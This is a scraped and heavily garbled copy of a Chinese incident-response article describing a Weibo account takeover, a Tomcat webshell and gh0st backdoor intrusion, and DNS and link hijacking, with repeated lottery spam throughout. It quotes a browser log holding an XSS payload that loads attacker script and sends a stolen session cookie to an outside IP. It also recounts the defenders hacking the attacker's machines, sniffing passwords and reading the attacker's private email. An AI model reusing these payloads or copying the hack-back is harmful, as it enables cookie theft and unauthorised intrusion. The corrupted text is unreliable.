IT技術互動交(jiao)流平jiao)/h4>

天天PK10官网

作者︰Painting  發(fa)布日(ri)期︰2020-02-21 21:38:28

峰會(hui)上(shang)講過(guo)的議題(ti),整理成文(wen)章,以供(gong)大家批(pi)評指正。

對于企業應(ying)急響應(ying),我想只要從you)擄an)全(quan)工(gong)作的同(tong)學都有接觸,我也(ye)一樣(yang),在甲(jia)方乙方工(gong)作的這幾年,處理過(guo)不少應(ying)急響應(ying)的事件,但是每個人都會(hui)有自(zi)己做事的方法,在這里(li)我主要分(fen)享一下(xia)我對應(ying)急響應(ying)的理解(jie)以及對踫(peng)到的一些案(an)例。

天天PK10官网


應(ying)急響應(ying),估計最近幾年听(ting)到這個詞更多(duo)是因為各(ge)大甲(jia)方公(gong)司(si)開始建設和運營自(zi)己的應(ying)急響應(ying)平jiao)  ye)就(jiu)是 xSRC。看起來對報告(gao)到這些地方的漏(lou)洞進(jin)行(xing)處理就(jiu)已經成為企業應(ying)急響應(ying)的主要工(gong)作,但是以我之前(qian)在甲(jia)方親自(zi)參與建設應(ying)急響應(ying)平jiao) 腿?qi)他企業應(ying)急響應(ying)平jiao)ㄌ嶠jiao)漏(lou)洞的經驗來看,能真正把(ba)平jiao)ㄉshang)的漏(lou)洞當時應(ying)急響應(ying)事件去處理的寥寥ren)wu)幾,更多(duo)的只是︰接you)>處理這種簡單重復的流水線工(gong)作。因為他們會(hui)覺得報告(gao)到這些地方的漏(lou)洞它(ta)的風險(xian)是可控的。

我理解(jie)的應(ying)急響應(ying)是對突huan) 奈粗zhi)的安(an)全(quan)事件進(jin)行(xing)應(ying)急響應(ying)處理。這種情況一般(ban)都是“被黑(hei)”了。“被黑(hei)”包括很多(duo)種︰服務(wu)器被入侵,業務(wu)出現蠕蟲(chong)事件,用戶(hu)以及公(gong)司(si)員工(gong)被釣魚(yu)攻擊,業務(wu)被 DDoS 攻擊,核心(xin)業務(wu)出現DNS、鏈路劫持攻擊等等等等。

天天PK10官网


我在峰會(hui)上(shang)說是**的,雖然只是開個玩笑(xiao),但是也(ye)能夠huan)從吵鱟 ying)急響應(ying)是一件苦差事,有的時候要做到 7*24 小時響應(ying),我覺得是沒人喜(xi)歡這麼(me)一件苦差事的,但是作為安(an)全(quan)人員這是我們的職責。

那說到底我們為什麼(me)做應(ying)急響應(ying)呢,我覺得有以下(xia)幾個因素︰

  1. 保障業務(wu)
  2. 還原攻擊
  3. 明確意圖
  4. 解(jie)決方案(an)
  5. 查漏(lou)補缺(que)
  6. 司(si)法途徑

    對于甲(jia)方的企業來說業務(wu)永遠是第一位的,沒有業務(wu)何(he)談安(an)全(quan),那麼(me)我們做應(ying)急響應(ying)首先就(jiu)是要保障業務(wu)能夠正常運行(xing),其(qi)次是還原攻擊場景,攻擊者是通過(guo)什麼(me)途徑進(jin)行(xing)的攻擊,業務(wu)中存在什麼(me)樣(yang)的漏(lou)洞,他的意圖是什麼(me)?竊取數(shu)據?炫(xuan)耀(yao)技術?當我們了解(jie)到前(qian)面的之後就(jiu)需(xu)要提出解(jie)決方案(an),修(xiu)復漏(lou)洞?還是加強訪問控制?增添監控手(shou)段?等等,我們qian)訓鼻qian)的問題(ti)解(jie)決掉之後,我們還需(xu)要查漏(lou)補缺(que),來解(jie)決業務(wu)中同(tong)樣(yang)的漏(lou)洞?最後就(jiu)是qie)璨恍xu)要司(si)法的介(jie)入。

    天天PK10官网


    具(ju)體怎麼(me)做應(ying)急響應(ying),我之前(qian)根(gen)據自(zi)己做應(ying)急響應(ying)的經驗總結幾點︰

    1. 確定攻擊時間
    2. 查找攻擊線索
    3. 梳(shu)理攻擊流程
    4. 實(shi)施解(jie)決方案(an)
    5. 定位攻擊者

      確定攻擊時間能夠幫助(zhu)我們縮小應(ying)急響應(ying)的範圍,有助(zhu)于我們提高效率(lv),查找攻擊線索,能夠讓我們知(zhi)道攻擊者都jia)雋聳裁me)事情,梳(shu)理攻擊流程則是還原整個攻擊場景,實(shi)施解(jie)決方案(an)就(jiu)是qie)薷窗an)全(quan)漏(lou)洞,切(qie)斷攻擊途徑,最後就(jiu)是定位攻擊人,則是取證。

      ps︰定位攻擊者,我覺得羅卡定律說的挺好的︰凡有接觸,必留痕跡。

      天天PK10官网


      一huan)矯嫖頤強梢園ba)被動的局(ju)面轉變為主動的局(ju)面,在這種主動的局(ju)面下(xia)我們能夠了解(jie)到攻擊者都對我們做了什麼(me)事情,做到什麼(me)程度,他下(xia)一步的目標會(hui)是什麼(me)?最關(guan)鍵的我們能夠知(zhi)道攻擊者是誰。

      那麼(me)具(ju)體怎麼(me)做呢?就(jiu)要用攻擊者的方法反擊攻擊者。說起來簡單,做起來可能就(jiu)會(hui)發(fa)現很難(nan),但是我們可以借(jie)助(zhu)我們自(zi)身的優勢(shi),通過(guo)業務(wu)數(shu)據交(jiao)叉(cha)對比來對攻擊者了解(jie)更多(duo),甚至可以在攻擊者的後門(men)里(li)面加上(shang)攻擊代(dai)碼等。

      天天PK10官网


      這是第一個案(an)例,是官方微博帳號被盜(dao)的案(an)例。首先看下(xia)面兩張圖片︰

      enter image description here

      enter image description here

      某天我們的一個官方帳號突huan)  fa)兩jiao)醪徽5奈 ├諶藎 吹降諞惶醯氖焙蚧掛暈 槍gong)作人員小手(shou)一抖,test 到手(shou),以為是工(gong)作人員的誤(wu)操作,但是看到第二條微博的時候就(jiu)已經能夠判斷xian)屎懦雋宋侍ti),具(ju)體是什麼(me)問題(ti)只能通過(guo)後面的分(fen)析才知(zhi)道。

      但是肯定的是這不是工(gong)作人員進(jin)行(xing)的操作,一huan)矯嬖謖庵種匾 屎諾牟僮魃shang)有一些制度,其(qi)次是發(fa)布的內容也(ye)比較明顯,根(gen)據發(fa)布的時間通過(guo)後台系統分(fen)析,該帳號有通過(guo) cookie 在非公(gong)司(si) IP 進(jin)行(xing)過(guo)登錄,但是我們的 cookie 是通過(guo) httponly 進(jin)行(xing)保護的,how?

      接下(xia)來鎖定那個時間段操作過(guo)官方微博帳號同(tong)事的工(gong)作電腦,在其(qi)使用的火狐瀏覽器中發(fa)現有下(xia)面連續的幾條訪問記錄︰

      ==================================================URL  : http://t.cn/zW*bUQLast Visit Date : 2020-02-21 21:38:27====================================================================================================URL  : http://50.116.13.242/index.phpLast Visit Date : 2020-02-21 21:38:28Referrer  : http://t.cn/zW*bUQ====================================================================================================URL  : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript︰%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})Last Visit Date : 2020-02-21 21:38:28Referrer  : http://50.116.13.242/index.phpTitle  : player.swf (application/x-shockwave-flash 對象)====================================================================================================URL  : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2Last Visit Date : 2020-02-21 21:38:31Referrer  : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript︰%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})==================================================

      對上(shang)面的訪問記錄我想我ye)恍xu)要做太多(duo)的解(jie)釋。在官方微博帳號的私信里(li)面有 http://t.cn/zW*bUQ 的私信記錄。

      到這里(li)就(jiu)已經能夠還原整個攻擊場景了

      1. 工(gong)作人員收到一條私信,並(bing)且打開了
      2. 私信鏈接you)且桓xss 漏(lou)洞的鏈接
      3. 攻擊代(dai)碼利用另(ling)外一個業務(wu)的 apache httponly cookie 泄露漏(lou)洞竊取到 cookie

        事後我們qie)薷戳甦獯喂?髦械穆lou)洞,同(tong)時修(xiu)復了業務(wu)中同(tong)類的安(an)全(quan)漏(lou)洞,同(tong)時加強了員工(gong)安(an)全(quan)意識,並(bing)且增加了相應(ying)的帳號安(an)全(quan)策(ce)略。

        最後我們通過(guo)後台的 IP 和郵(you)箱等數(shu)據定位到了攻擊者,在整個攻擊中也(ye)並(bing)沒有惡意,他也(ye)把(ba)相關(guan)的漏(lou)洞和攻擊過(guo)程提交(jiao)到烏雲漏(lou)洞報告(gao)平jiao)  蠹銥梢勻?髡菊藝藝飧雎lou)洞,我這里(li)就(jiu)不貼相關(guan)鏈接了。

        天天PK10官网


        首先看下(xia)圖

        enter image description here

        一天 QA 發(fa)來郵(you)件詢問一個比較異常的事情,某測試業務(wu)出現多(duo)條狀態(tai)碼為 500 的日(ri)志,QA 懷疑是有黑(hei)客攻擊,我們開始介(jie)入進(jin)行(xing)分(fen)析。

        500 錯誤(wu)代(dai)表文(wen)件真實(shi)存在過(guo)並(bing)且被人訪問shou)蔥xing)過(guo),但是現在文(wen)件已經被刪除了,通過(guo)文(wen)件名(ming)可以判斷xi) 鞘且滴wu)需(xu)要的文(wen)件,被黑(hei)的可能性比較大,然後找來 TOMCAT 和前(qian)端 Nginx 日(ri)志查看的確被上(shang)傳了 webshell。

        enter image description here

        根(gen)據攻擊者 IP 和時間等線索通過(guo)分(fen)析 nginx 和 tomcat 的日(ri)志可以確定攻擊者是通過(guo) tomcat 的管理後台上(shang)傳的 webshell,並(bing)且通過(guo) webshell 做了許多(duo)操作

        enter image description here

        但是tomcat 帳號密碼並(bing)非弱密碼,how?我們接下(xia)來對全(quan)網的 tomcat 進(jin)行(xing)了排(pai)查,發(fa)現在其(qi)中一台內網服務(wu)器存在 tomcat 弱口(kou)令,並(bing)且帳號pai)渲夢wen)件中含有攻擊者使用的帳號和密碼,只是這台服務(wu)器較早之前(qian)下(xia)線了公(gong)網 IP,只保留內網 IP,並(bing)且通過(guo)分(fen)析這台服務(wu)器的日(ri)志,能夠判斷攻擊者之前(qian)就(jiu)已經通過(guo)弱口(kou)令拿(na)到了服務(wu)器權限,並(bing)且收集(ji)了服務(wu)器上(shang)的用戶(hu)名(ming)和密碼等信息。

        我們想看看攻擊者到底想干什麼(me),對之前(qian)收集(ji)的攻擊者 IP 進(jin)行(xing)反滲透(tou),用“黑(hei)客”的方法拿(na)到香港(gang),廊坊多(duo)台攻擊者肉雞權限,肉雞上(shang)發(fa)現了大量黑(hei)客工(gong)具(ju)和掃描日(ri)志,在其(qi)中一台肉雞上(shang)發(fa)現我們內網仍(reng)有服務(wu)器被控制。

        下(xia)面兩張圖片可以看到攻擊者通過(guo) lcx 中轉了內網的反彈 shell

        enter image description here

        enter image description here

        那麼(me)到目前(qian)為止我們做了哪些事情呢?

        1. 清理後門(men)
        2. 清理全(quan)網 tomcat
        3. 梳(shu)理全(quan)網 web 目錄文(wen)件
        4. 修(xiu)改業務(wu)相關(guan)帳號密碼
        5. 修(xiu)改業務(wu)關(guan)鍵代(dai)碼
        6. 加強 IDC 出口(kou)策(ce)略
        7. 部署 snort

          做了好多(duo)事情?可是事lv)瞪shang)呢?事情並(bing)沒有我們想的那麼(me)簡單。

          之前(qian)的安(an)全(quan)事件剛過(guo)不久,IT 人員反饋域控服務(wu)器異常,自(zi)動重啟,非qian)R斐!5鍬加蚩亟jin)行(xing)排(pai)查原因,發(fa)現域控被植入了 gh0st 後門(men)。

          enter image description here

          域控被控制,那域控下(xia)面的服務(wu)器的安(an)全(quan)性就(jiu)毫無(wu)保障,繼續對辦公(gong)網所有的 windows 服務(wu)器排(pai)查,發(fa)現多(duo)台 Windows 服務(wu)器被植入後門(men),攻擊的方法是通過(guo)域控管理員帳號密碼利用 at 方式jiao)砑蛹隻 ren)務(wu)。

          能夠知(zhi)道攻擊者是如何(he)入侵的域控服務(wu)器比較關(guan)鍵,對域控服務(wu)器的日(ri)志進(jin)行(xing)分(fen)析發(fa)現下(xia)面可疑的日(ri)志︰

          2020-02-21,14:03:47,Security,審核成功,登錄/注銷(xiao) ,540,**,PDC,”成功的網絡登錄:用戶(hu)名(ming): *.ad域: *登錄 ID: (0x0,0x1114E11)登錄類型: 3登錄過(guo)程: NtLmSsp 身份驗證數(shu)據包: NTLM工(gong)作站名(ming): CC-TEST-V2登錄 GUID: -調(diao)用方用戶(hu)名(ming): -調(diao)用方域: -調(diao)用方登錄 ID: -調(diao)用方進(jin)程 ID: -傳遞服務(wu): -源(yuan)網絡地址: 192.168.100.81源(yuan)端口(kou): 02020-02-21,3:13:38,Security,審核失敗,帳戶(hu)登錄 ,680,NT AUTHORITYSYSTEM,PDC,'嘗試 登錄的用戶(hu): MICROSOFT_AUTHENTICATION_PACKAGE_V1_0登錄帳戶(hu): QM-*$源(yuan)工(gong)作站: CC-TEST-V2錯誤(wu)代(dai)碼: 0xC000006A'2020-02-21,3:13:38,Security,審核失敗,帳戶(hu)登錄 ,680,NT AUTHORITYSYSTEM,PDC,'嘗試 登錄的用戶(hu): MICROSOFT_AUTHENTICATION_PACKAGE_V1_0登錄帳戶(hu): QM-*$源(yuan)工(gong)作站: CC-TEST-V2錯誤(wu)代(dai)碼: 0xC000006A

          結合之前(qian)的信息能夠鎖定 192.168.100.81 是攻擊源(yuan),遂(sui)對這台服務(wu)器進(jin)行(xing)確認,結果有點令人吃驚︰

          這是一台虛(xu)擬(ni)機,運行(xing)在一台普通的 PC 機上(shang),這台 PC 機就(jiu)放在業務(wu)部門(men)同(tong)事的腳底下(xia),這台虛(xu)擬(ni)機本身啟用了 3389,存在弱口(kou)令,我們之前(qian)在對內網安(an)全(quan)檢查時,這台虛(xu)擬(ni)機處于關(guan)機狀態(tai)。由于這台虛(xu)擬(ni)機上(shang)面跑的有xie)饈砸滴wu),域控管理員曾經登錄過(guo)。

          綜合我們之前(qian)得到的信息可以確定這台虛(xu)擬(ni)機是攻擊者入侵我們qian)旃gong)網的第一台服務(wu)器,通過(guo)把(ba)這個虛(xu)擬(ni)機作為跳板(ban)攻擊辦公(gong)網其(qi)他服務(wu)器,至于這台虛(xu)擬(ni)機是如何(he)被入侵的,我們後面也(ye)確定是因為上(shang)次的攻擊事件,攻擊者通過(guo) IDC 進(jin)入到的辦公(gong)網。

          我們又做了什麼(me)?

          1. 排(pai)查所有 windows 服務(wu)器
          2. 對之前(qian)確定被入侵的服務(wu)器重裝,包括域控
          3. snort 上(shang)加了 gh0st 的特(te)征

            snort 加上(shang) gh0st 的特(te)征後不久我們就(jiu)發(fa)現我們qian)旃gong)網還有服務(wu)器被控制

            enter image description here

            對這台服務(wu)器進(jin)行(xing)清理後,我們仍(reng)然沒有放棄(qi)對攻擊者的反滲透(tou),這次我們發(fa)現攻擊者還有美國(guo)的 IP,對其(qi)滲透(tou),最終通過(guo) c 斷進(jin)行(xing) cain 嗅探到 3389 的na)藶搿/p>

            登錄到這台美國(guo) IP 的服務(wu)器後,發(fa)現上(shang)面運行(xing)著 gh0st 的控制端,我們內網仍(reng)然有一台服務(wu)器處于上(shang)線狀態(tai)。

            enter image description here

            其(qi)實(shi)到這里(li)這次事件就(jiu)能告(gao)一段落(luo)了,關(guan)于攻擊者我們在這台美國(guo)的服務(wu)器上(shang)發(fa)現了攻擊者的多(duo)個 QQ 和密碼,登錄郵(you)箱後找到了攻擊者的簡歷等私人信息,還有就(jiu)是我們之前(qian)也(ye)獲取到攻擊者在國(guo)內某安(an)全(quan)論壇帳號。其(qi)實(shi)到這里(li)我們能夠確定攻擊者是誰了。

            enter image description here

            enter image description here

            天天PK10官网


            對于劫持我想大家都不陌生,我們在生活中比較常見到的就(jiu)是運營商在頁面中xie)迦牘愀gao)等代(dai)碼,這種就(jiu)是一種劫持攻擊。

            回到案(an)例本身,我們的一個業務(wu)先後出現多(duo)次多(duo)種手(shou)段的劫持攻擊,一次是 dns 劫持,把(ba)業務(wu)的域名(ming)劫持到 61.* 這個 ip 上(shang),另(ling)外一次是鏈路劫持,替換huan)wu)器返回給用戶(hu)的 http 響應(ying)內容,這兩次的目的都一樣(yang)就(jiu)是在登錄口(kou)添加 js 代(dai)碼,用于竊取用戶(hu)的用戶(hu)名(ming)和明文(wen)na)藶搿N頤橇ling)外一個業務(wu)也(ye)遭(zao)受鏈路劫持,直接替換客戶(hu)投放的廣告(gao)代(dai)碼,給業務(wu)造成很大的經濟損(sun)失。

            下(xia)面兩個圖是我們業務(wu)監控系統和基(ji)調(diao)的截圖,上(shang)面的圖可以很明顯看到在 9:30 用戶(hu)登錄成功數(shu)明顯下(xia)降,持續不到一個小時,下(xia)圖是全(quan)國(guo)部分(fen)地區基(ji)調(diao)的數(shu)據,可以看到域名(ming)被明顯劫持到 61 這個 ip,這是一次典型的 DNS 攻擊。

            enter image description here

            enter image description here

            頁面中被插入的攻擊核心(xin)代(dai)碼

            1234567891011121314151617181920212223
  • 天天PK10官网

About IT165 - 廣告(gao)服務(wu) - 隱(yin)私聲(sheng)明 - 版權申明 - 免責條款 - 網站地圖 - 網友投稿 - 聯系方式
本站內容來自(zi)于互聯網,僅供(gong)用于網絡技術學習,學習中請遵循相關(guan)法律法規
天天PK10官网 | 下一页